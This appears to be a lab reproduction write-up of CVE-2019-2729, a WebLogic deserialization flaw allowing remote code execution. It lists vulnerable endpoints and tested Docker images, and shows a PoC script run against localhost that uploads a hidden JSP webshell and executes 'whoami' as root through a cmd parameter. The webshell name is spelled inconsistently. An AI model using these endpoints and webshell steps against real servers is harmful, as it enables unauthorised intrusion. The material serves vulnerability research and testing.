WebLogic — CVE-2019-2729
Background
WebLogic wls-wsat Deserialization RCE
- CVSS
- VECTOR
- IMPACT
- AFFECTEDWebLogic≤ 10.3.6.0< CPU Jun 2019
- WebLogic≤ 12.1.3.0< CPU Jun 2019
- WebLogic≤ 12.2.1.3< CPU Jun 2019
An unauthenticated remote code execution vulnerability in wls-wsat.war and wls9_async_response.war due to unsafe deserialization of Java objects. A remote attacker sends a crafted serialized Java object via HTTP to execute arbitrary code as the web server user. Exploiting wls-wsat.war returns command output; wls9_async_response.war is blind.
Vulnerable endpoints
wls-wsat.war (returns output):
/wls-wsat/CoordinatorPortType/wls-wsat/RegistrationPortTypeRPC/wls-wsat/ParticipantPortType/wls-wsat/RegistrationRequesterPortType/wls-wsat/CoordinatorPortType11/wls-wsat/RegistrationPortTypeRPC11/wls-wsat/ParticipantPortType11/wls-wsat/RegistrationRequesterPortType11
wls9_async_response.war (blind):
/_async/AsyncResponseService
Tested environments
| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | vulhub/weblogic:10.3.6.0-2017 | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | vulhub/weblogic:12.2.1.3-2018 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | vulhub/weblogic:12.2.1.3 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | weblogic:12.2.1.3 | Inconclusive | "Old format work area header is disabled." |
Reproduction
POC || GTFO
File(s): weblogic_get_webshell.py, payload.txt, payload2.txt, payload3.txt
weblogic_get_webshell.py runs three payloads against the target simultaneously, uploading a webshell and enabling direct command execution via the /_async/ endpoint:
zsh
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami :
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
rootReferences